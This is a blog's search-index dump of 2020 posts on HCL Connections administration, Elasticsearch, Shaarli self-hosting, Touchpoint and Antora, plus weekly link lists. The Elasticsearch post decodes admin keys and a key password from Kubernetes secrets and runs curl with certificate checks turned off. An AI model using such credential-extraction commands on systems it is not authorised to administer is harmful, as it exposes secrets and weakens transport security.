curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from 04 to 11 of October. Intigriti […]\nhttps://github.com/aceking007/Byte-Sized-Code[A collection of Jupyter notebooks for learning Python from the ground up. icon:external-link[], window=_blank]:: A collection of Jupyter notebooks for learning Python from the ground up. - aceking007/Byte-Sized-Code\nhttps://github.com/dastergon/postmortem-templates[A collection of postmortem templates icon:external-link[], window=_blank]:: Postmortem templates\nhttps://github.com/danluu/post-mortems[A collection of postmortems icon:external-link[], window=_blank]:: Good source to write postmortems.\n","excerpt":"\u003cp\u003e\u003ca href=\"https://mkaz.blog/working-with-vim/vimwiki/[VimWiki\" target=\"_blank\"\u003ehttps://mkaz.blog/working-with-vim/vimwiki/[VimWiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – Working with Vim – mkaz.blog   icon:external-link[], window=_blank]:: I switched for daily notes and diary entries to Vimwiki. I like the fast access and combine it with gollum to display in the browser. In the article you find shortcuts and tipps for working with the todo function.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_42_2020/","title":"Linkdump Week 42 / 2020"},{"body":"Another week is over, for a quite busy one. I\u0026rsquo;m still working on automating HCL Connections installation and think about creating pytests for these deployments. So here is the this weeks mix of my bookmarks, tools I used and articles I found interesting.\nhttps://wizardzines.com/comics/bash-errors/[BASH errorhandling - wizard zines icon:external-link[], window=_blank]:: Good intro on Bash errorhandling from Julia Evans\nhttp://blog.cretaria.com/posts/bye-bye-apple.html[Bye-bye Apple icon:external-link[], window=_blank]:: Very interesting post, I did that move years ago. I started using Linux on a daily basis on my work notebook around 2008. Sometimes parallel with Mac OS. Today I think about switching my Lenovo notebook to OpenBSD, but I need to work with different business tools for meetings, remote access and so on. So I will first build a test environment. Maybe it is time to write a \u0026ldquo;tools I use\u0026rdquo; article.\nhttps://www.digitalocean.com/community/tutorials/how-to-inspect-kubernetes-networking[How To Inspect Kubernetes Networking icon:external-link[], window=_blank]:: Kubernetes is a container orchestration system that can manage containerized applications across a cluster of server nodes. Maintaining network connectivity between all the containers in a cluster requires some advanced networking techniques.\nhttps://github.com/eldadru/ksniff[Kubectl plugin to ease sniffing on kubernetes pods using tcpdump and wireshark icon:external-link[], window=_blank]:: A kubectl plugin that utilize tcpdump and Wireshark to start a remote capture on any pod in your Kubernetes cluster. You get the full power of Wireshark with minimal impact on your running pods. Easier to implement than using sidecars.\nhttps://samcurry.net/hacking-apple/[We Hacked Apple for 3 Months: Here’s What We Found icon:external-link[], window=_blank]:: Very interesting article about the Apple bugbounty program and vulnerabilities.\nhttps://www.ansible.com/resources/webinars-training/ansible-tower-basics-workflows[Ansible Tower Basics: Workflows icon:external-link[], window=_blank]:: Interesting introduction into AWX the free version of Ansible Tower.\nhttps://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/[Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass \u0026amp; GitHub Actions secrets - Intigriti icon:external-link[], window=_blank]:: Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.\nhttps://keystore-explorer.org/[KeyStore Explorer icon:external-link[], window=_blank]:: KeyStore Explorer is an open source GUI replacement for the Java command-line utilities keytool and jarsigner. KeyStore Explorer presents their functionality, and more, via an intuitive graphical user interface.\nhttps://miguendes.me/7-pytest-features-and-plugins-that-will-save-you-tons-of-time-ckfsjlr8y02axv6s1f8is1pgh[7 pytest Features and Plugins That Will Save You Tons of Time icon:external-link[], window=_blank]:: In this tutorial, we\u0026rsquo;ll learn the best pytest features and plugins to speed up your development process. They\u0026rsquo;re very simple and you can start using them right away.\n","excerpt":"\u003cp\u003eAnother week is over, for a quite busy one. I\u0026rsquo;m still working on automating HCL Connections installation and think about creating pytests for these deployments. So here is the this weeks mix of my bookmarks, tools I used and articles I found interesting.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://wizardzines.com/comics/bash-errors/[BASH\" target=\"_blank\"\u003ehttps://wizardzines.com/comics/bash-errors/[BASH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n errorhandling - wizard zines   icon:external-link[], window=_blank]:: Good intro on Bash errorhandling from Julia Evans\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_41_2020/","title":"Linkdump Week 41 / 2020"},{"body":"Today I activated Elasticsearch Metrics and Typeahead Search on my demo HCL Connections cluster .\nTo my surprise the indices weren’t created and I got errors on the wsadmin.sh commands.\nSearchService.createESQuickResultsIndex() I checked the Elasticsearch pods which showed a running state, but the logs showed following messages:\n[es-master-c9cc5d877-trwsd es-master] [2020-10-08T12:11:13,708][WARN ][o.e.c.r.a.DiskThresholdMonitor] \\ [es-master-c9cc5d877-trwsd] high disk watermark [90%] exceeded on [sqwY58MtRa2MoPkHr1o70Q][es-data-2][/data/data/nodes/0] \\ free: 2.7gb[5.4%], shards will be relocated away from this node So even with 2.7GB free space it does not generate the needed shards and indices. This is default behavior of Elasticsearch , but can be changed :\ncurl -XPUT \u0026#34;http://es-host:9200/_cluster/settings\u0026#34; \\ -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;persistent\u0026#34;: { \u0026#34;cluster\u0026#34;: { \u0026#34;routing\u0026#34;: { \u0026#34;allocation.disk.threshold_enabled\u0026#34;: false } } } }\u0026#39; I’m pretty sure I will need this in customer environments too, because on big NFS clusters 10% disks can be equal to some hundred GB diskspace.\nBUT this will not work with the Elasticsearch pods of HCL Connections Componentpack, because it is secured with Secureguard and you need to have a client SSL certificate for authentication.\nConnect to Elasticsearch on the Componentpack Kubernetes Cluster During the setup of Elasticsearch metrics, you export the keystore and ca keys from Kubernetes secrets:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;chain-ca\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; chain-ca.pem kubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-metrics\\.p12\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-metrics.p12 We can import the elasticssearch-metrics.p12 to our browser and it will use the include certificate to connect to the elasticsearch server.\nSo accessing https://kubernetes-node:30099/_cat/indices will show you all available indices and their status, after you imported the keystore.\nTo use the adminkeys, we need to export two additional keys:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.key\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.key kubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.crt.pem Check Server settings\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XGET \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; Enter PEM pass phrase: {\u0026#34;persistent\u0026#34;:{},\u0026#34;transient\u0026#34;:{}} Now we can connect with curl and disable the threshold\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XPUT \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; \\ -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;persistent\u0026#34;: { \u0026#34;cluster\u0026#34;: { \u0026#34;routing\u0026#34;: { \u0026#34;allocation.disk.threshold_enabled\u0026#34;: false } } } }\u0026#39; Enter PEM pass phrase: {\u0026#34;acknowledged\u0026#34;:true,\u0026#34;persistent\u0026#34;:{\u0026#34;cluster\u0026#34;:{\u0026#34;routing\u0026#34;:{\u0026#34;allocation\u0026#34;:{\u0026#34;disk\u0026#34;:{\u0026#34;threshold_enabled\u0026#34;:\u0026#34;false\u0026#34;}}}}},\u0026#34;transient\u0026#34;:{}}% Use the password from you Componentpack setup If you can’t remember the password, use this command:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-key-password\\.txt\u0026#39;]}\u0026#34; | base64 -d password Check setting You can open the url with your browser (where you imported the keystore), or use curl again:\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XGET \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; Enter PEM pass phrase: {\u0026#34;persistent\u0026#34;:{\u0026#34;cluster\u0026#34;:{\u0026#34;routing\u0026#34;:{\u0026#34;allocation\u0026#34;:{\u0026#34;disk\u0026#34;:{\u0026#34;threshold_enabled\u0026#34;:\u0026#34;false\u0026#34;}}}}},\u0026#34;transient\u0026#34;:{}} See logs of all Elasticsearch pods Download kubetail kubetail -l component=elasticsearch -n connections During my tests, I checked `elasticsearch-metrics.p12\u0026rsquo; with https://keystore-explorer.org and found, that the client key is only valid for two years. So we need to remember to update this (or hope that HCL will provide us with an update and documentation on this topic).\nOr check the imported certificate in the browser.\nWhy is this important? During the setup we had to import the keystore to WebSphere and copy it to all WebSphere nodes! I will not update automatically.\n","excerpt":"\u003cp\u003eToday I activated \u003ca href=\"https://help.hcltechsw.com/connections/v65/admin/install/cp_config_es_migrate_cognos_data.html\" target=\"_blank\"\u003eElasticsearch Metrics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://help.hcltechsw.com/connections/v65/admin/install/inst_managing_es_index_cnx_typeahead_search.html\" target=\"_blank\"\u003eTypeahead Search \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on my demo \u003ca href=\"https://www.hcltechsw.com/products/connections\" target=\"_blank\"\u003eHCL Connections cluster \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eTo my surprise the indices weren’t created and I got errors on the \u003ccode\u003ewsadmin.sh\u003c/code\u003e commands.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSearchService.createESQuickResultsIndex()\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eI checked the Elasticsearch pods which showed a running state, but the logs showed following messages:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/elasticsearch/","title":"Elasticsearch index creation problem"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/git/","title":"Git"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hacktoberfest/","title":"Hacktoberfest"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/intigriti/","title":"Intigriti"},{"body":"It is Linkdump time again. I fixed some things during the week, so my https://github.com/Shaarli/Shaarli[Shaarli instance] can use the API now. I do a lot of research and reading on mobile devices (tablet and phone). Now I can share important articles through https://stakali.toneiv.eu/[Stakali] , add short notes and do followups on my other devices (tablet, computer). To automate the linkdump posts, I created a short https://gitlab.com/stoeps/shaarli2hugo[Python script to collect my saved bookmarks] (marked with the tag linkdump) and create an asccidoc document for my hugo instance. So I can do a quick review and post it.\nShaarli creates a https://shaarli.stoeps.de/?do=daily[daily overview] and a https://shaarli.stoeps.de/?do=tagcloud[tag cloud] of saved bookmarks.\nhttps://joel.net/how-one-guy-ruined-hacktoberfest2020-drama[How One Guy Ruined #Hacktoberfest2020 #Drama icon:external-link[], window=_blank]:: Hacktoberfest If you aren\u0026rsquo;t familar, Hacktoberfest is an annual eventthat occurs every October. It is held by Digital Ocean and encouragesdevelopers to submit Pull Requests to Open Source repositories and as areward you get a T-Shirt. A good idea from Digitalocean, this time Github is flooded with a lot of tiny spam PR.\nhttps://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/[Bug Bytes #90 - The impossible XSS, Burp Pro tips \u0026amp; A millionaire on bug bounty and meditation - Intigriti icon:external-link[], window=_blank]:: __Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from 18 to 25 of September. Our […]__Huge collection of links to articles, podcasts and videos from the infosec and bugbounty community\nhttps://www.lambdatest.com/blog/test-automation-using-pytest-and-selenium-webdriver/[Test Automation Using Pytest and Selenium WebDriver icon:external-link[], window=_blank]:: __Pytest is test framework used to make simple, yet scalable test case swith ease. Let\u0026rsquo;s learn how to Automate test process using Pytest and Selenium WebDriver.__I used unittest and selenium before, but heared that pytest is newer and the better approach. I\u0026rsquo;m in the beginning of building tests for HCL Connections and will check if pytest is really better or easier than unittest.\nhttps://matrix.org/blog/2020/09/30/welcoming-gitter-to-matrix[Welcoming Gitter to Matrix! icon:external-link[], window=_blank]:: https://gitlab.com [Gitlab] sold https://gitter.im/[Gitter] tohttps://matrix.org[Matrix] this week.I think both projects can benefit from this. In the moment I like Gitter more, but when the teams merge features it gets even better.\nhttps://gitlab.com/stoeps/shaarli2hugo[shaarli2hugo icon:external-link[], window=_blank]:: Automation script to prepare shared Shaarli bookmark collections on aHugo blog.\n","excerpt":"\u003cp\u003eIt is Linkdump time again.\nI fixed some things during the week, so my \u003ca href=\"https://github.com/Shaarli/Shaarli[Shaarli\" target=\"_blank\"\u003ehttps://github.com/Shaarli/Shaarli[Shaarli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n instance] can use the API now.\nI do a lot of research and reading on mobile devices (tablet and phone).\nNow I can share important articles through \u003ca href=\"https://stakali.toneiv.eu/[Stakali]\" target=\"_blank\"\u003ehttps://stakali.toneiv.eu/[Stakali] \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, add short notes and do followups on my other devices (tablet, computer).\nTo automate the linkdump posts, I created a short \u003ca href=\"https://gitlab.com/stoeps/shaarli2hugo[Python\" target=\"_blank\"\u003ehttps://gitlab.com/stoeps/shaarli2hugo[Python \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n script to collect my saved bookmarks] (marked with the tag linkdump) and create an asccidoc document for my hugo instance.\nSo I can do a quick review and post it.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_40_2020/","title":"Linkdump Week 40 / 2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/bookmarks/","title":"Bookmarks"},{"body":"I use Shaarli since ages to collect links, notes and bookmarks. I worked a little bit on that collection and started to share some as public lists .\nOn my mobile device I bought a license for Stakali , it fits perfectly into my workflows. I often search on my mobile and share the link through Stakali to my desktop. Stakali just needs the URL and the API Key of Shaarli, but I got errors. So I analyzed the source and app with:\nGenymotion Burp Suite Community Edition Stakali has an option to disable SSL Key checking, so no need to use any more tools to intercept the traffic. On Android you normally have to disable SSL Pinning. Here is a good start to learn how to do this .\nEven with enabled API it didn’t work. First I used the default .htaccess, but got Error 500 accessing the api.\n.htaccess\n# Disable directory listing Options -Indexes RewriteEngine On # Prevent accessing subdirectories not managed by SCM RewriteRule ^(.git|doxygen|vendor) - [F] RewriteCond %{HTTP:Authorization} ^(.+) RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] # REST API RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^ index.php [L] ... Add this line With RewriteBase the Error 500 accessing the API disappeared, but logon with mobile still wasn’t possible.\nI enabled the debug mode and wrote a little php script to check the headers and environment variables:\nshaarli/data/config.json.php\n... }, \u0026#34;dev\u0026#34;: { \u0026#34;debug\u0026#34;: true } } Add a new element to the json to enable debugging My hoster uses FastCGI with PHP and this strips the Authorization header, but the RewriteRule RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] should add an environment variable HTTP_AUTHORIZATION with the content of the Authorization header.\nThis does not work for me, but I found a workaround:\n.htaccess\n... SetEnvIf Authorization .+ HTTP_AUTHORIZATION=$0 # RewriteCond %{HTTP:Authorization} ^(.+) # RewriteRule ^(.*)$ $1 [E=HTTP_AUTHORIZATION:%1,PT] ... add this line\ncomment out\ncomment out\nI replaced the RewriteRule with this SetEnvIf directive. Now I found the used Bearer JWT Token when I debugged the access, but Shaarli didn’t accept the token, because the variable was renamed to REDIRECT_HTTP_AUTHORIZATION and Shaarli is not aware of this.\nI couldn’t find an easy way to get this working, so I changed the code directly and created a Pull Request . I added the comments to .htaccess to make it easier (just comment out or in the rewrite rules) and application/api/ApiMiddleware.php.\nYou can see all changes here . Not sure if this all is needed or good, but it works for me. I just added the new environment variable and the application doesn’t run into exceptions any more.\n","excerpt":"\u003cp\u003eI use \u003ca href=\"https://github.com/shaarli/shaarli\" target=\"_blank\"\u003eShaarli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n since ages to collect links, notes and bookmarks. I worked a little bit on that collection and started to \u003ca href=\"https://shaarli.stoeps.de\" target=\"_blank\"\u003eshare some as public lists \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eOn my mobile device I bought a license for \u003ca href=\"https://stakali.toneiv.eu/\" target=\"_blank\"\u003eStakali \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, it fits perfectly into my workflows. I often search on my mobile and share the link through Stakali to my desktop. Stakali just needs the URL and the API Key of Shaarli, but I got errors. So I analyzed the source and app with:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/shaarli/","title":"Selfhost Shaarli"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/selfhosting/","title":"Selfhosting"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/shaarli/","title":"Shaarli"},{"body":"HCL included some additional apps with HCL Connections 6.5CR1. One of them is Touchpoint, which can be used to present users the \u0026ldquo;Terms and Conditions\u0026rdquo; (or Privacy and Guidelines) of the environment and some help creating their profile, network and become member of their first communities.\nTouchpoint writes some profile extension entries in the PEOPLEDB database in the table PROFILE_EXTENSIONS, most important:\ntouchpointState: stores the information if a user has completed Touchpoint and the timestamp of completion\nprivacyAndGuidelines: Version number of accepted Privacy Guidelines\nExample \"PROF_KEY\" \"PROF_PROPERTY_ID\" \"PROF_VALUE\" \"94caae68-8eb7-42fd-ac76-e04d4c0ab6bf\"\ntouchpointState\n\"{\"\"state\"\":\"\"complete\"\",\"\"timestamp\"\":1599817448000}\"\n\"94caae68-8eb7-42fd-ac76-e04d4c0ab6bf\"\nprivacyAndGuidelines\n\"2.1\"\nTo activate touchpoint itself, you have to edit touchpoint-config.xml in the LotusConnections-config folder of your Websphere deployment.\nActivate and Configure Touchpoint \u0026lt;config id=\u0026#34;touchpoint\u0026#34; xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34; xsi:noNamespaceSchemaLocation=\u0026#34;touchpoint-config.xsd\u0026#34;\u0026gt; \u0026lt;uiEnabled\u0026gt;true\u0026lt;/uiEnabled\u0026gt; \u0026lt;steps\u0026gt; \u0026lt;paths\u0026gt; \u0026lt;defaultPath\u0026gt;welcome,editProfile,profileTags,findColleagues,followCommunities\u0026lt;/defaultPath\u0026gt; \u0026lt;icExternalPath\u0026gt;welcome,editProfile,profileTags\u0026lt;/icExternalPath\u0026gt; \u0026lt;pagStandalone\u0026gt;pagStandalone\u0026lt;/pagStandalone\u0026gt; \u0026lt;/paths\u0026gt; \u0026lt;order\u0026gt;welcome,editProfile,profileTags,findColleagues,followCommunities\u0026lt;/order\u0026gt; \u0026lt;welcome\u0026gt; \u0026lt;templateFile\u0026gt;templates/welcome.html\u0026lt;/templateFile\u0026gt; \u0026lt;/welcome\u0026gt; \u0026lt;/steps\u0026gt; \u0026lt;privacyAndGuidelines\u0026gt; \u0026lt;enabled\u0026gt;true\u0026lt;/enabled\u0026gt; \u0026lt;version\u0026gt;2.1\u0026lt;/version\u0026gt; \u0026lt;externalLink\u0026gt;https://stoeps.de\u0026lt;/externalLink\u0026gt; \u0026lt;internalLink\u0026gt;https://stoeps.de\u0026lt;/internalLink\u0026gt; \u0026lt;/privacyAndGuidelines\u0026gt; \u0026lt;maxPromotedExperts\u0026gt;3\u0026lt;/maxPromotedExperts\u0026gt; \u0026lt;promotedExperts/\u0026gt; \u0026lt;maxPromotedCommunities\u0026gt;3\u0026lt;/maxPromotedCommunities\u0026gt; \u0026lt;promotedCommunities/\u0026gt; \u0026lt;welcomeVideoUrl/\u0026gt; \u0026lt;contentDirectory\u0026gt;/opt/nfs/touchpoint/\u0026lt;/contentDirectory\u0026gt; \u0026lt;orientMe\u0026gt; \u0026lt;enabled\u0026gt;false\u0026lt;/enabled\u0026gt; \u0026lt;socialCtxRoot\u0026gt;/social\u0026lt;/socialCtxRoot\u0026gt; \u0026lt;itmCtxRoot\u0026gt;/itm\u0026lt;/itmCtxRoot\u0026gt; \u0026lt;/orientMe\u0026gt; \u0026lt;/config\u0026gt; Set to true to enable Touchpoint\nSet to true to enable Privacy and Guidelines\nVersion number, increase to display the guidelines again\nWhen you increase the PAG version and restart Touchpoint, the users get the PAG screen when they refresh or open a Connections page, or on the next login.\nTouchpoint and Privacy and Guidelines (PAG) can be activated independently. So just Touchpoint, PAG standalone or both.\nWithin paths you can configure the shown pages for internal users, external users and PAG.\nAll configuration options in the official documentation: https://help.hcltechsw.com/connections/v65/admin/install/tp_r_touchpoint_config_properties.html TDI caveats The default TDI Assemblyline (tdisol-path/TDI/conf/LotusConnections-config/tdi-profiles-config.xml) has following entries since the touchpoint integration:\n\u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; What does this mean? Everytime when you run sync_all_dns.sh|bat and a user profile is changed, the database extension entries (privacyAndGuidlines,touchpointState and touchpointSession) of all changed users will be overwritten and Touchpoint/PAG will be presented to these users over and over again, WHEN the LDAP doesn’t contain this attributes (and I bet it doesn’t).\nAs long as you just want to use PAG or Touchpoint, comment out these three lines to prevent getting Touchpoint over and over again.\nJust comment out (all five lines of touchpoint extensions)\n\u0026lt;!-- \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;recommendedTags\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;departmentKey\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; --\u0026gt; So these values are handled by Touchpoint and no longer set or overwritten by TDI.\nUpdate I forgot to mention, when you disable the fields in tdi-profiles-config.xml, you have to comment out the same fields in conf/LotusConnections-config/profiles-types.xml:\n\u0026lt;!-- \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;recommendedTags\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;departmentKey\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;read\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;true\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;privacyAndGuidelines\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;touchpointState\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; \u0026lt;property\u0026gt; \u0026lt;ref\u0026gt;touchpointSession\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;true\u0026lt;/hidden\u0026gt; \u0026lt;fullTextIndexed\u0026gt;false\u0026lt;/fullTextIndexed\u0026gt; \u0026lt;/property\u0026gt; --\u0026gt; Thanks to Vincent Gicquel , for remembering me.\nUpdate 2 Another possible workaround to prevent TDI from deleting the touchpoint state is described in this article. ","excerpt":"\u003cp\u003eHCL included some additional apps with HCL Connections 6.5CR1. One of them is Touchpoint, which can be used to present users the \u0026ldquo;Terms and Conditions\u0026rdquo; (or Privacy and Guidelines) of the environment and some help creating their profile, network and become member of their first communities.\u003c/p\u003e\n\u003cp\u003eTouchpoint writes some profile extension entries in the \u003ccode\u003ePEOPLEDB\u003c/code\u003e database in the table \u003ccode\u003ePROFILE_EXTENSIONS\u003c/code\u003e, most important:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/touchpointinhclcnx/","title":"Touchpoint in HCL Connections 6.5CR1"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/antora/","title":"Antora"},{"body":"Time is running very fast and I completely forgot to update the blog for a long time.\nWhat happened since DNUG Day 2020 ?\nChanging the job Some have already seen on LinkedIn that I joined Vegard IT . I’m very excited and see forward working and meeting with the new colleagues. During the Covid lockdown on boarding is a tough process, but I think we’re doing very well. So I’m still around and work with Connections, Kubernetes and other fun stuff.\nEngage 2020 I attended Engage 2020 and enjoyed it very much meeting old and new friends. The session with Martin Schmidt was a big fun, we talked about \u0026ldquo;Kubernetes - Build or Buy\u0026rdquo;, slides can be downloaded .\nThanks Theo , Hilde and the team of Engage for building this event.\nKubernetes Since months I do more and more Kubernetes deployments. So I built local clusters with Vagrant , Terraform , Rancher and kubeadm .\nMy goals are getting the CKA certification the next weeks and a smooth (automated) deployment for HCL Connections Componentpack.\nSo I work on topics like troubleshooting, breaking \u0026amp; reparing clusters and think about backup \u0026amp; restore of applications.\nHCL Connections 6.5CR1 The first installs (test, demo, production) are running very good. The new componentpack supports newer Kubernetes versions now.\nTechnical writing - documentation as code The last days I moved some of my Asciidoctor files to Antora . Antora can create documentation from multiple git repositories. So I can keep the documentation in the projects (e.g. Connections deployment repositorieis) and create a large set of documentation for my local computer or our intranet. Other definitions can create the single project documentation (just one repository).\nI like Antora because it can work with Asciidoctor files, but it is way more. It splits content from ui, is fast and helps me even handle my daily notes.\nAntora can handle git tags and branches, so new versions can be documented in new branches and the documentation provides all documents from all created versions. See the Antora docs , or one of the other projects which uses Antora. For example:\nFedora Linux Couchbase Docs Great article to start with Antora and a complete intro on Antora and Asciidoctor .\n","excerpt":"\u003cp\u003eTime is running very fast and I completely forgot to update the blog for a long time.\u003c/p\u003e\n\u003cp\u003eWhat happened since \u003ca href=\"/2020/01/15/dnug-connections-day-2020/\"\u003eDNUG Day 2020\u003c/a\u003e\n?\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/some-updates/","title":"Some updates (some delayed) on Engage 2020, Connections, my job and documentation as code"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/asciidoc/","title":"Asciidoc"},{"body":"I write most of my documentation with Asciidoctor , so saving some keystrokes is important.\nYou can add window=_blank to links in your Asciidoctor source.\nFor example:\n* https://www.duckduckgo.com[window=_blank] * https://www.duckduckgo.com[DuckDuckGo, window=_blank] https://www.duckduckgo.com DuckDuckGo So this creates links with the html source:\n\u0026lt;ul\u0026gt; \u0026lt;li\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;https://www.duckduckgo.com\u0026#34; class=\u0026#34;bare\u0026#34; target=\u0026#34;_blank\u0026#34; rel=\u0026#34;noopener\u0026#34;\u0026gt;https://www.duckduckgo.com\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;/li\u0026gt; 